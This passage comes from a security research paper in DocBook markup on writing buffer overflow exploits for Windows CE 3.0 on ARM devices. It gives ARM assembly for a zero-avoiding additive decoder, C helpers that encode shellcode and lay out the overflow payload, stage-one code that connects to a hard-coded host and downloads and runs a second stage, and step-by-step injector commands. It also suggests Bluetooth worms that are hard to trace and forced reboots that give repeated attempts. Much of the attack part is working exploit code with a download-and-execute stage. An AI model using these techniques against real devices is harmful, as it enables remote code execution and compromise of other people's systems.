classic Von Neumann design. As such, data and instructions are segregated
into two separate buses, each with a separate set-associative cache.
Between the data cache and main memory there is a write buffer. The data
cache operates in <quote>write-back</quote> mode, thus creating a validity
problem. It is possible that when the exploit is injected, the data is
sent to the data cache but not yet written back to main memory. Therefore
when the same address is read on the instruction bus, the exploit code
will not be present and random junk will be executed instead. In testing,
only the first few instructions had been flushed back by the time the
exploit was called, allowing it to start but not complete. To fix
this problem, the write buffer must be flushed to send all data back to
main memory, synchronising caches and memory. It is not necessary to
invalidate the instruction cache as it is unlikely that instructions will
have been read from the stack region of memory.
			</para>

			<para>
Three instructions are required to flush the write buffer. The
instructions for this process can be seen in <xref linkend="invinstr"/>.
			</para>

			<figure id="invinstr">
				<title>Buffer Drain Technique</title>
				<programlistingco>
					<areaspec>
						<area id="invinstr.1" coords="1" units="linecolumn"/>
						<area id="invinstr.2" coords="2" units="linecolumn"/>
						<area id="invinstr.3" coords="3" units="linecolumn"/>
					</areaspec>
					<programlisting>    mcr    p15, 0, r0, c7, c10, 4
    mrc    p15, 0, r0, c2, c0, 0
    mov    r0, r0
					</programlisting>
					<calloutlist>
						<callout arearefs="invinstr.1">
							<para>Instruction to drain the write
buffer. The contents of r0 are irrelevant.</para>
						</callout>
						<callout arearefs="invinstr.2">
							<para>Arbitrary read of CP15.</para>
						</callout>
						<callout arearefs="invinstr.3">
							<para>Wait for the drain to complete.</para>
						</callout>
					</calloutlist>
				</programlistingco>
			</figure>

			<para>
It is worth noting that exploit code development would be considerably
harder if WCE implemented rudimentary security measures. This
is because the <quote>mcr</quote> and <quote>mrc</quote> instructions are
privileged. Since the whole of WCE, including user code, runs in
privileged mode, exploits are viable.
			</para>
		</sect3>

		<sect3>
			<title>WCE 3.0 and the Sensitive Stack</title>
			<para>
While testing shellcode it was found that WCE was very sensitive to the
program counter placement with respect to the stack. The general rule
discovered was that if (SP &lt;= PC &amp;&amp; PC &lt;=  FP) then the
operating system would hang. It is unknown whether this occurred at a
context switch or due to some code in <filename>coredll.dll</filename>. It
is unlikely that this is an intentional stack protection mechanism. The OS
also seemed to hang when the PC was placed just above the FP. This may
have been due to the PC being in an area of memory reserved for another
thread's stack.
			</para>

			<para>
Further testing revealed that if any attempt was made to move the stack
further up in memory, the device would also hang. It is likely that the OS
was being confused by a stack from one thread impinging on the memory
reserved for another thread although this has not yet been confirmed.
			</para>

			<para>
Due to the sensitive nature of the stack, the decision was made to destroy
the current stack, moving the FP value to the SP. This creates an area of
memory between the SP and the shellcode for functions to use. During
testing it was found that the area of memory created was not large enough
to use functions safely. Functions would routinely overwrite the shellcode
and cause unpredictable behavior, often resulting in the hard reset of the
device.
			</para>

			<para>
The only option left for the shellcode was to increase the amount of
memory between the SP and the shellcode. Since the default stack size of
WCE is 64KB, a large amount of space below the SP was available. The
additive decoder function does not call any functions and so can safely
execute in the area close to the SP. Therefore the additive decoder can be
used to move the shellcode away from the SP allowing it to execute safely
and reliably.
			</para>

			<para>
It should be noted that this effect can be used to force the owner of the
device to reset it following a failed overflow attempt. If the process that
is being exploited is started at boot time, a soft reset of the device will
cause it to be restarted and will therefore offer another chance at
exploitation.
			</para>
		</sect3>

		<sect3 id="thezeroproblem">
			<title>The Zero Problem</title>
			<para>
In many applications, data reception will terminate on a NUL (\0)
character. This poses a particular problem for the ARM architecture as
many instructions contain 8 bit aligned zeros as padding or flag fields.
There are two common methods for zero avoidance: tailoring each
instruction individually to remove any zero bytes, or using a decoder
to remove a 32 bit additive from each instruction.
			</para>
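
			<para>
As an illustration of the problem, the test for an 8 bit aligned zero can be
sketched in C as below. The function name <function>has_zero_byte</function>
is hypothetical and is not part of the accompanying toolkit.
			</para>
			<programlisting><![CDATA[
#include <stdint.h>

/* Return 1 if any of the four bytes of a 32 bit word is zero, else 0. */
int has_zero_byte(uint32_t word)
{
	int shift;

	for (shift = 0; shift < 32; shift += 8) {
		if (((word >> shift) & 0xff) == 0)
			return 1;
	}
	return 0;
}
]]></programlisting>
			<para>
For example, <quote>mov r0, r0</quote> assembles to 0xe1a00000, which
contains two zero bytes, whereas <quote>mov r1, r1</quote> assembles to
0xe1a01001, which contains none.
			</para>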

			<para>
The first method results in slightly smaller code. However, multiple
instructions may be needed where a single instruction would suffice if
zero characters were allowed. This method is also labour intensive and
requires that structures containing zeros be dynamically generated.
			</para>

			<para>
The second method requires that a decoder be placed in front of the
shellcode. Whilst the decoder must not contain any zero characters the
rest of the shellcode may. The complete decoder requires sixteen
instructions and therefore an extra 64 bytes. If the shellcode were
guaranteed not to contain any 32 bit zero values, approximately four
instructions could be removed. This is not usually possible as some
structures may require a zero value.
			</para>

			<para>
To maintain the simplicity of the first stage shellcode, it was decided
that the second method be used. Having assembled the shellcode,
<filename>e954</filename> can be used to generate the additive value.
<filename>e954</filename> generates the additive value by adding a
candidate number to each 32 bit instruction in turn. When the sum of an
instruction and the additive contains an 8 bit aligned zero character, a
value of 1 is added to that particular byte of the additive and the
encoding is rechecked from the beginning. Any carry bits generated by the
encoding are ignored. While this method of encoding is relatively simple,
the additive is quick to generate and easy to decode. Armed with this
additive, the shellcode injector will automatically encode the assembly.
			</para>
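
			<para>
The search described above might be sketched as follows. This is a minimal
illustration of the description and not the source of
<filename>e954</filename>: the names <function>find_additive</function>,
<function>zero_byte_index</function> and <function>bump_byte</function>, the
starting value of 0x01010101 and the retry limit are all assumptions. The
sketch also assumes that the additive itself must be free of zero bytes,
since it is transmitted alongside the shellcode.
			</para>
			<programlisting><![CDATA[
#include <stddef.h>
#include <stdint.h>

#define MAX_BUMPS 65536ul	/* assumed retry limit so the search always ends */

/* Index (0-3) of the first zero byte in word, or -1 if there is none. */
static int zero_byte_index(uint32_t word)
{
	int i;

	for (i = 0; i < 4; i++) {
		if (((word >> (8 * i)) & 0xff) == 0)
			return i;
	}
	return -1;
}

/* Add 1 to one byte of the additive, skipping zero and not carrying over. */
static uint32_t bump_byte(uint32_t add, int idx)
{
	uint32_t shift = 8u * (uint32_t)idx;
	uint32_t b = ((add >> shift) + 1u) & 0xff;

	if (b == 0)
		b = 1;
	return (add & ~((uint32_t)0xff << shift)) | (b << shift);
}

/*
 * Find an additive so that no encoded word contains a zero byte.
 * Returns 1 and stores the additive on success, 0 if the limit is hit.
 */
int find_additive(const uint32_t *words, size_t n, uint32_t *additive)
{
	uint32_t add = 0x01010101u;
	unsigned long bumps = 0;
	size_t i = 0;

	while (i < n) {
		/* uint32_t addition drops the carry out of bit 31 */
		int idx = zero_byte_index(words[i] + add);

		if (idx < 0) {
			i++;
			continue;
		}
		if (++bumps > MAX_BUMPS)
			return 0;
		add = bump_byte(add, idx);
		i = 0;		/* recheck from the beginning */
	}
	*additive = add;
	return 1;
}
]]></programlisting>
			<para>
The caller passes the assembled first stage as an array of 32 bit words. A
return value of 0 indicates that no additive was found within the limit.
			</para>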

			<para>
Specific exploits may be sensitive to characters other than \0, or
indeed may require specific encoding techniques for non ASCII character
sets. Examples of these techniques can be seen in <productname>The
Shellcoder's Handbook</productname>.
			</para>
		</sect3>

		<sect3>
			<title>The Additive Decoder</title>

		<figure id="additivedec">
			<title>Additive Decoder Function</title>
			<programlistingco>
				<areaspec>
					<area id="additivedec.1" coords="1" units="linecolumn"/>
					<area id="additivedec.2" coords="2" units="linecolumn"/>
					<area id="additivedec.3" coords="4" units="linecolumn"/>
					<area id="additivedec.4" coords="5" units="linecolumn"/>
					<area id="additivedec.5" coords="6" units="linecolumn"/>
					<area id="additivedec.6" coords="8" units="linecolumn"/>
					<area id="additivedec.7" coords="10" units="linecolumn"/>
					<area id="additivedec.8" coords="11" units="linecolumn"/>
					<area id="additivedec.9" coords="12" units="linecolumn"/>
					<area id="additivedec.10" coords="13" units="linecolumn"/>
					<area id="additivedec.11" coords="14" units="linecolumn"/>
					<area id="additivedec.12" coords="16" units="linecolumn"/>
					<area id="additivedec.13" coords="19" units="linecolumn"/>
				</areaspec>
				<programlisting>    mcr    p15, 0, r7, c7, c10, 4
    mov    sp, fp

    adr    r4, additive
    ldr    r5, [r4, #-0x04]
    sub    r6, pc, #0x8000
    mov    r3, r6
    adr    r2, shellcode_start
additive_start:
    ldr    r1, [r2], #0x04
    sub    r1, r1, r5
    str    r1, [r3], #0x04
    subs   r1, r4, r2
    bne    additive_start

    mcr    p15, 0, r7, c7, c10, 4
    mrc    p15, 0, r1, c2, c0, 0
    mov    r1, r1
    mov    pc, r6
shellcode_start:
additive:
				</programlisting>
				<calloutlist>
					<callout arearefs="additivedec.1">
						<para>Drain the write buffer.</para>
					</callout>
					<callout arearefs="additivedec.2">
						<para>Erase the current stack.</para>
					</callout>
					<callout arearefs="additivedec.3">
						<para>Load r4 with the address of the additive.
This value is used for comparison by the decoder to determine when the end
of the shellcode has been reached. This instruction is altered by the
shellcode injector to point to the real address. A dummy label is included
for assembly only; the actual value is altered by
<filename>e954</filename>.</para>
					</callout>
					<callout arearefs="additivedec.4">
						<para>Load r5 with the additive. 4 is subtracted
from the address to prevent a \0 appearing in the resulting encoding.</para>
					</callout>
					<callout arearefs="additivedec.5">
						<para>Load r6 with the new address for the
shellcode. This also saves an instruction to invalidate the cache, as the
instruction cache should have no knowledge of this area and would
therefore have to retrieve it from main memory. The new address is 32KB
(0x8000 bytes) below the current value of the PC, creating enough space for
the stack to expand. The value is copied to r3 for use as the write pointer;
the value in r6 remains constant.</para>
					</callout>
					<callout arearefs="additivedec.6">
						<para>Load r2 with the start address of the
encoded shellcode.</para>
					</callout>
					<callout arearefs="additivedec.7">
						<para>Load r1 with the instruction to decode.
Having loaded the instruction, 4 is added to the value of r2, incrementing
it to the next instruction.</para>
					</callout>
					<callout arearefs="additivedec.8">
						<para>Subtract the additive from the
instruction.</para>
					</callout>
					<callout arearefs="additivedec.9">
						<para>Save the real instruction from r1 into the
location pointed to by r3, then add 4 to r3 to obtain the next instruction
address.</para>
					</callout>
					<callout arearefs="additivedec.10">
						<para>Compare r4 to r2. While the same effect
could have been obtained with cmp r4, r2, the resulting encoding contains
a large number of \0 characters which would be detrimental to the
decoder's purpose.</para>
					</callout>
					<callout arearefs="additivedec.11">
						<para>Loop if all the instructions have not been
decoded.</para>
					</callout>
					<callout arearefs="additivedec.12">
						<para>Re-drain the write buffer. This is done
because the decoder writes the decoded instructions via the data bus, but
they will be fetched for execution via the instruction bus.</para>
					</callout>
					<callout arearefs="additivedec.13">
						<para>Jump to the decoded shellcode.</para>
					</callout>
				</calloutlist>
			</programlistingco>
		</figure>

		<para>
The complete additive decode function shown in
<xref linkend="additivedec"/> links together all the previous issues
providing an initial bootstrap for the first stage shellcode.
		</para>
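
		<para>
The arithmetic performed by the decoder can be modelled on a host machine
with the C sketch below. The function names are hypothetical:
<function>encode_words</function> stands in for the encoding step of the
injector, <function>decode_words</function> mirrors the additive_start loop,
and <function>relocation_target</function> reproduces the
<quote>sub r6, pc, #0x8000</quote> calculation. The last of these relies on
the fact that reading the PC in ARM state yields the address of the current
instruction plus 8.
		</para>
		<programlisting><![CDATA[
#include <stddef.h>
#include <stdint.h>

/* Value placed in r6, given the address of the sub instruction itself. */
uint32_t relocation_target(uint32_t sub_insn_addr)
{
	return sub_insn_addr + 8u - 0x8000u;
}

/* Host side: add the additive to every word, wrapping modulo 2^32. */
void encode_words(uint32_t *dst, const uint32_t *src, size_t n,
		  uint32_t additive)
{
	size_t i;

	for (i = 0; i < n; i++)
		dst[i] = src[i] + additive;
}

/* Device side model: subtract the additive and store each word at dst. */
void decode_words(uint32_t *dst, const uint32_t *src, size_t n,
		  uint32_t additive)
{
	size_t i;

	for (i = 0; i < n; i++)
		dst[i] = src[i] - additive;
}
]]></programlisting>
		<para>
Because both operations wrap at 32 bits, decoding always recovers the
original word regardless of any carry lost during encoding. If the decoder
were placed at an address of 0x0002fa60 with no padding, the
<quote>sub</quote> instruction would sit at 0x0002fa70 and
<function>relocation_target</function> would return 0x00027a78.
		</para>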

		</sect3>
	</sect2>

	<sect2>
		<title>Stage One</title>
		<para>
When the exploit is injected into the vulnerable process, it triggers the
first stage shellcode. As the amount of code space in the exploit is
minimal, the goal of the first stage is to download supplemental code from
a location and place it on the heap, where it will be executed. The code
is not placed on the stack as function calls may destroy it.
		</para>

		<para>
The location and protocol that the second stage shellcode is downloaded
from can be altered. In the example first stage, the
<structname>sockaddr_in</structname> is hard coded to 192.168.1.100 port
2048. When running this exploit on a different network, it will be
necessary to alter this address. The shellcode uses TCP/IP to obtain
the second stage, although this could easily be altered to use UDP/IP if
required. Another possibility is Bluetooth. This would allow for the
creation of Bluetooth worms, which would be difficult to trace back to
their creator.
Currently the most common Bluetooth stack manufacturer, WIDCOMM, does not
publicly distribute the API and therefore a Bluetooth executable would
need to be disassembled to obtain the correct function calls. In WCE .NET,
Microsoft have developed an open Bluetooth stack. Despite this, many PDA
manufacturers are still deploying the WIDCOMM stack in preference.
		</para>
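
		<para>
When altering the address, the hard coded values can be derived as in the
following C sketch. The helper names <function>pack_ipv4</function> and
<function>pack_port</function> are hypothetical and do not appear in the
toolkit. The sketch only shows the arithmetic, and assumes that the address
is written most significant octet first and the port in network byte order.
		</para>
		<programlisting><![CDATA[
#include <stdint.h>

/* Pack the dotted quad a.b.c.d into 32 bits, most significant octet first. */
uint32_t pack_ipv4(uint8_t a, uint8_t b, uint8_t c, uint8_t d)
{
	return ((uint32_t)a << 24) | ((uint32_t)b << 16) |
	       ((uint32_t)c << 8) | (uint32_t)d;
}

/* Store a 16 bit port as two bytes in network (big endian) order. */
void pack_port(uint8_t out[2], uint16_t port)
{
	out[0] = (uint8_t)(port >> 8);
	out[1] = (uint8_t)(port & 0xff);
}
]]></programlisting>
		<para>
For the default location, <function>pack_ipv4(192, 168, 1, 100)</function>
gives 0xc0a80164. Port 2048 is 0x0800, so its low byte is zero. This is one
example of a structure that requires a zero value and therefore relies on
the decoder.
		</para>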

		<figure id="stage1pseudo">
			<title>Stage 1 Pseudo Code</title>
			<programlisting>
/* Pseudo code: byte order conversions are omitted. 0xc0a80164 is 192.168.1.100 */
struct sockaddr_in sin = { AF_INET, 2048, 0xc0a80164 };
void stage1(void)
{
	uint8_t *buf = 0;
	uint32_t buf_sz = 0, buf_len = 0;
	int sock, i;

	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock &lt; 0) goto error;

	if (connect(sock, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0)
		goto error;

	while (1) {
		/* Grow the buffer by 4KB whenever it is full. */
		if (buf_len == buf_sz) {
			buf = (uint8_t *)realloc(buf, buf_sz + 0x1000);
			if (0 == buf) goto error;
			buf_sz += 0x1000;
		}

		i = recv(sock, buf + buf_len, buf_sz - buf_len, 0);
		if (i &lt; 0) goto error;
		if (i == 0) break;	/* Connection closed: download complete. */
		buf_len += i;
	}

	flush_buffers();
	((void (*)(void))buf)();	/* Execute the second stage. */

	error:
		goto error;
}
			</programlisting>
		</figure>

		<para>
<xref linkend="stage1pseudo"/> shows the pseudo code for the stage 1
shellcode. This shellcode is optimised for size, as a smaller first stage
is usable in more situations. It can also be seen that
currently, when an error occurs, the code enters an infinite loop. This
loop will consume a large amount of CPU time and will usually force the
owner to reboot the device, thus providing another opportunity for
exploitation.
		</para>

		<para>
While testing, it was found that on WCE 2003, if the
<function>WSAStartup</function> function was called more than once, the
calling thread was killed. However, WCE 2002 does not suffer from this bug.
		</para>
	</sect2>

	<sect2>
		<title>Stage Two</title>
		<para>
The second stage shellcode can be much more complex than the first. It can
be almost unlimited in size and produced easily by a compiler then
extracted from an executable. However in this case, the second stage will
simply be a message box indicating that the shellcode has been executed
correctly and will then terminate the process.
		</para>

		<figure id="stage2pseudo">
			<title>Stage 2 Pseudo Code</title>
			<programlisting>
void stage2(void)
{
	HANDLE h;
	MessageBox(0, L"0wn3d", 0, MB_OK);
	h = GetOwnerProcess();
	TerminateProcess(h, 0);
}
			</programlisting>
		</figure>
	</sect2>
</sect1>


<sect1>
	<title>Obtaining the Buffer Address</title>

	<para>
A large part of the exploitation process is obtaining the address of the
buffer that is going to be exploited. This is important as it defines the
jump address that must overwrite the return address. It also provides an
approximate size of the overrun value.
	</para>

	<para>
In the case of the example server included in the accompanying source, the
buffer address is easily obtained. The source can be edited to display the
address of the character array, or a breakpoint can be set in Microsoft
eMbedded Visual C++, at which point the thread variables can be examined.
The example code buffer
starts at 0x0002fa60. A slot 0 address is specified so the exploit will
succeed when running in any process slot.
	</para>
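
	<para>
The relationship between a slot 0 address and the same location in another
process slot can be sketched as below. This assumes the 32MB process slots
of the WCE memory architecture described in the Microsoft documentation
listed in <xref linkend="appendix_doc"/>. The names
<literal>WCE_SLOT_SIZE</literal>, <function>to_slot0</function> and
<function>slot_of</function> are hypothetical.
	</para>
	<programlisting><![CDATA[
#include <stdint.h>

#define WCE_SLOT_SIZE 0x02000000u	/* assumed: 32MB per process slot */

/* Map an address inside any process slot to its slot 0 equivalent. */
uint32_t to_slot0(uint32_t addr)
{
	return addr & (WCE_SLOT_SIZE - 1u);
}

/* Number of the slot that an address falls in. */
uint32_t slot_of(uint32_t addr)
{
	return addr / WCE_SLOT_SIZE;
}
]]></programlisting>
	<para>
Under this assumption an address of 0x0602fa60, seen while the process
occupies slot 3, corresponds to the slot 0 address 0x0002fa60.
	</para>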

	<para>
In other executables, the debug information or source may not be
available, so the <productname>Visual C++</productname> debugger must be
used. Version 3.0 is not able to attach to processes and so must run the
executable from start time. To do this, the executable must be downloaded
onto the host PC running <productname>ActiveSync</productname>. Create a
new project in Visual C++, and import the executable. Alter the project
settings so that when Visual C++ uploads the executable onto the device,
it overwrites the old version. This will allow the debugger to run the
executable. To find the buffer start address, a known string can be sent
as an identifier, which can be searched for in memory. When the executable
crashes, the debugger will close and it will not be able to access the
device's memory. <productname>Visual C++</productname> 4 and above allow
the user to attach to a process. Use this version if possible, although it
will depend on the version of WCE being used.
	</para>
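
	<para>
Once a region of memory has been dumped from the debugger, the search for
the identifier string can be automated. The following C sketch assumes the
dump has already been read into a buffer on the host.
<function>find_marker</function> is a hypothetical helper, and the caller
adds the base address of the dump to the returned offset to obtain the
buffer address.
	</para>
	<programlisting><![CDATA[
#include <stddef.h>
#include <string.h>

/*
 * Return the offset of the first occurrence of marker within mem,
 * or (size_t)-1 if the marker is not present.
 */
size_t find_marker(const unsigned char *mem, size_t mem_len,
		   const unsigned char *marker, size_t marker_len)
{
	size_t i;

	if (marker_len == 0 || marker_len > mem_len)
		return (size_t)-1;

	for (i = 0; i + marker_len <= mem_len; i++) {
		if (memcmp(mem + i, marker, marker_len) == 0)
			return i;
	}
	return (size_t)-1;
}
]]></programlisting>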

	<para>
The process of finding the buffer address can be helped by other software
such as IDA Pro, which is able to disassemble an executable. The execution
path can then be traced back from system calls to
<function>recv</function>, <function>memcpy</function> or others.
	</para>

	<para>
A further development on the process of finding the buffer start address
is to use a JTAG debugger, which can talk directly to GDB or the Visual C++
debugger. This device is able to halt the CPU and step through
instructions at a hardware level, eliminating the requirement for a
debugger on the host device and ActiveSync. However, it is likely that
access to the JTAG signal connections will require invasive alterations to
the host device. Although manufacturers do not advertise the JTAG pin
connections, several people have reverse engineered various hardware
devices to find them. Examples of JTAG connectors and debuggers can be
seen in <xref linkend="appendix_hw"/>.
	</para>
</sect1>


<sect1>
	<title>The Final Exploit</title>

	<sect2>
		<title>Test devices</title>
		<para>
The code and exploits detailed within this paper were all tested and
executed on an HP iPAQ 5450 running <productname>Windows CE
3.0</productname> (Windows Mobile 2002). Software was compiled using
<productname>Microsoft eMbedded Visual C++ 3.0</productname> (which is
available freely from Microsoft) and the GNU Binutils package. Please
refer to <xref linkend="appendix_sw"/> for the location of all software
downloads.
		</para>
	</sect2>

	<sect2>
		<title>The Injector</title>
		<para>
The exploit is run through the <command>inject</command> command. Before
executing the injector, the correct decoder and first stage shellcode are
defined. By default <filename>inject.c</filename> contains the assembled
opcodes from <filename>additive.s</filename> and
<filename>stage1.s</filename>. The injector also needs to know which
instruction is the ADR opcode to calculate the correct offset. Finally the
additive value must be specified for the injector to encode the first
stage shellcode.
		</para>

		<para>
When the injector is run, the target address, port, jump address and
buffer size must be specified. The injector ensures the jump address is
correctly aligned by padding if necessary. Following the padding, the
decoder and first stage shellcode are sent. Finally the injector sends the
jump address multiple times, until the number of bytes sent equals the
buffer size. The buffer size specified should be larger than the buffer
being overflowed so that the return address can be altered. In some cases,
depending on the compiler and function complexity, the stack pointer may
not be overwritten; however, the decoder will fix the stack when it is
executed.
		</para>
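
		<para>
The layout described above can be sketched in C as follows. This is not the
source of <filename>inject.c</filename>: the function name
<function>build_payload</function>, the filler byte and the interpretation
of the alignment step (padding the front of the buffer so that the code
starts on a 4 byte boundary) are assumptions made for illustration. The code
length is assumed to be a multiple of four, as ARM instructions are.
		</para>
		<programlisting><![CDATA[
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Lay out: [padding][decoder + encoded stage one][jump address ...].
 * Returns the number of bytes written, or 0 if out_sz is too small.
 */
size_t build_payload(uint8_t *out, size_t out_sz,
		     const uint8_t *code, size_t code_len,
		     uint32_t buf_addr)
{
	size_t pad = (4u - (buf_addr & 3u)) & 3u;	/* bytes to next boundary */
	uint32_t jump = buf_addr + (uint32_t)pad;	/* aligned start of code */
	size_t off;

	if (pad + code_len + 4 > out_sz)
		return 0;		/* no room for even one jump address */

	memset(out, 'A', pad);
	memcpy(out + pad, code, code_len);

	/* Repeat the jump address, little endian, while whole words fit. */
	for (off = pad + code_len; off + 4 <= out_sz; off += 4) {
		out[off + 0] = (uint8_t)(jump & 0xff);
		out[off + 1] = (uint8_t)((jump >> 8) & 0xff);
		out[off + 2] = (uint8_t)((jump >> 16) & 0xff);
		out[off + 3] = (uint8_t)((jump >> 24) & 0xff);
	}
	return off;
}
]]></programlisting>
		<para>
Repeating the jump address means that the exact distance between the buffer
and the saved return address does not need to be known, provided that the
specified size is large enough to reach it.
		</para>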

		<para>
For the exploitable server in the toolkit, the following command will
inject the exploit correctly.
		</para>

		<para>
<command>./inject -j 0x0002fa60 -s 1200 -a 192.168.1.101 -p 4000</command>
		</para>

		<para>
The injector works by overwriting the return address stored on the stack.
When returning, a function removes all local variables from the stack
before executing <quote>ldmia sp, {sp, pc}</quote> or
<quote>ldmia sp, {pc}</quote>. This loads the address inserted by the
injector into the PC, and therefore allows the shellcode to take control
of the device.
		</para>
	</sect2>

	<sect2>
		<title>Running the Exploit</title>
		<para>
Having assembled all the shellcode using the <filename>Makefile</filename>
provided, three files of importance will be generated. The first,
<filename>stage1.txt</filename>, is the first stage shellcode in an
array format for direct inclusion into the injector. The second,
<filename>stage2.bin</filename>, is the second stage binary used by
the shellcode server; it will be downloaded by the first stage when
running. The third, <filename>e954</filename>, generates the additive
for use with the first stage shellcode. The list below gives a
step-by-step guide to using the toolkit.
		</para>

	<orderedlist>
		<listitem><para>
In the <filename>shellcode</filename> directory, assemble the shellcode:
<command>make</command>
		</para></listitem>
		<listitem><para>
In the <filename>shellcode_server</filename> directory, build the server:
<command>make</command>
		</para></listitem>
		<listitem><para>
Run the shellcode server:
<command>./shellcode_server -f ../shellcode/stage2.bin</command>
		</para></listitem>
		<listitem><para>
Open the project located in the <filename>server</filename> directory
using <productname>eMbedded Visual C++</productname> and build the
executable. If <productname>ActiveSync</productname> is running, the
resulting executable will be uploaded to the target device; otherwise
it will need to be copied over by hand.
		</para></listitem>
		<listitem><para>
Run the <command>server</command> executable on the WCE device. If the
executable was copied over by <productname>eMbedded Visual
C++</productname>, an icon will appear on the start menu.
		</para></listitem>
		<listitem><para>
Use <filename>e954</filename> to generate the correct additive value.
<command>./e954 stage1.bin</command>
		</para></listitem>
		<listitem><para>
In the <filename>inject</filename> directory, ensure that
<filename>inject.c</filename> has the correct additive, first stage and
decoder shellcode then build the executable: <command>make</command>
		</para></listitem>
		<listitem><para>
Execute the injector with the appropriate command line arguments. An
example of this is: <command>./inject -j 0x0002fa60 -s 1200 -a
192.168.1.101</command>.
		</para></listitem>
	</orderedlist>

		<para>
When the exploit is injected, the WCE device will display a message box
with the string <quote>0wn3d</quote> in it. If nothing is displayed and
the device hangs, the exploit has most likely failed.
		</para>
	</sect2>

	<figure id="wincedisplay">
		<title>Windows CE Display Running the Exploit</title>
		<mediaobject>
			<imageobject>
				<imagedata align="center" fileref="images/wince_display.jpg" format="JPEG"/>
			</imageobject>
		</mediaobject>
	</figure>

	<sect2>
		<title>Common Problems</title>
		<para>
When the exploit does not succeed, the device may hang. There are several
common causes for this. The checklist below will help to diagnose any
problems.
		</para>

		<itemizedlist>
			<listitem><para>Confirm that the exploitable server is running
on the target device.</para></listitem>
			<listitem><para>Ensure the shellcode server is running and is
reading from the correct <filename>.bin</filename> file.</para></listitem>
			<listitem><para>Check that the host and port in the first stage
shellcode are specified correctly. This defaults to
192.168.1.100:2048.</para></listitem>
			<listitem><para>Ensure that the shellcode server is reachable
from the device being exploited. Firewalls are a common cause of the
device not being able to contact the server. Also check the shellcode
server is listening on the correct port. By default the server listens on
0.0.0.0:2048.</para></listitem>
			<listitem><para>Confirm that the address being used by the
injector is actually where the shellcode is being
placed in memory.</para></listitem>
			<listitem><para>Ensure the shellcode injector is sending the
correct version of the decoder and first stage shellcode. Also confirm
that the jump instruction is correctly defined.</para></listitem>
		</itemizedlist>
	</sect2>
</sect1>

<sect1>
	<title>Further Research</title>
	<para>
During the course of developing the shellcode for this paper, some further
research ideas were highlighted. Firstly, all instructions are 32 bits in
length since ARM is a 32 bit RISC processor. This causes the shellcode to
be much larger than similar shellcode for a CISC processor. The ARM
processor offers a method to reduce the shellcode size significantly,
through the use of the Thumb instruction set, which
encodes each instruction into 16 bits rather than 32 bits. While the WCE
libraries will not operate with Thumb code, Thumb does offer a way to reduce
the size of the symbol locator and decoder. When the main body of the
shellcode is reached, the processor could switch out of Thumb mode to call
WCE library functions.
	</para>

	<para>
Secondly, it was found that the Microsoft eMbedded Visual C++ debugger was
lacking in many areas, causing it to crash frequently. Using a JTAG, it
should be possible to find overflows or debug shellcode using GDB in a
much more reliable manner. Some JTAG devices will also operate with
Microsoft eMbedded Visual C++, although it is not known how reliable this
method is.
	</para>
</sect1>


<appendix id="appendix_doc">
	<title>Further Reading</title>
	<itemizedlist>
		<listitem><para><productname>The Shellcoder's Handbook</productname>. ISBN 0764544683</para></listitem>
		<listitem><para><ulink url='http://www.insecure.org/stf/smashstack.txt'>Smashing the Stack for Fun and Profit.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.intel.com/design/intelxscale/273473.htm'>Intel XScale Core Developer's Manual.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.arm.com/pdfs/QRC0001H_rvct_v2.1_arm.pdf'>ARM Instruction Set Quick Reference Card.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.arm.com/miscPDFs/8031.pdf'>Procedure Call Standard for the ARM Architecture.</ulink></para></listitem>
		<listitem><para><ulink url='http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wcecoreos5/html/wce50conMemoryArchitecture.asp'>The Microsoft Windows CE Memory Architecture.</ulink></para></listitem>
		<listitem><para><ulink url='http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wcechp40/html/_armcall_arm_calling_standard.asp'>The Windows CE APCS.</ulink></para></listitem>
	</itemizedlist>
</appendix>
<appendix id="appendix_sw">
	<title>Software</title>
	<itemizedlist>
		<listitem><para><ulink url='ftp://ftp.gnu.org/pub/gnu/binutils/'>GNU Binutils.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.microsoft.com/downloads/details.aspx?FamilyID=d2645c21-8a85-45a2-8d13-653beb6cdddc&amp;DisplayLang=en'>Microsoft ActiveSync 3.8.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.microsoft.com/downloads/details.aspx?FamilyID=f663bf48-31ee-4cbe-aac5-0affd5fb27dd&amp;DisplayLang=en'>Microsoft eMbedded Visual Tools 3.0 (2002 Edition)</ulink></para></listitem>
		<listitem><para><ulink url='http://www.windowsembeddedkit.com/RegPage.aspx'>Microsoft Windows CE 5.0 Source Download</ulink></para></listitem>
	</itemizedlist>
</appendix>
<appendix id="appendix_hw">
	<title>Hardware</title>
	<itemizedlist>
		<listitem><para><ulink url='http://evilg.home.t-link.de/jtag-howto/'>HP5450 JTAG HowTo.</ulink></para></listitem>
		<listitem><para><ulink url='http://wiki.xda-developers.com/index.php?pagename=WallabyJTAG'>O2 XDA JTAG.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.epitools.com/products/probes.php'>EPI Majic LX.</ulink></para></listitem>
	</itemizedlist>
</appendix>
</article>


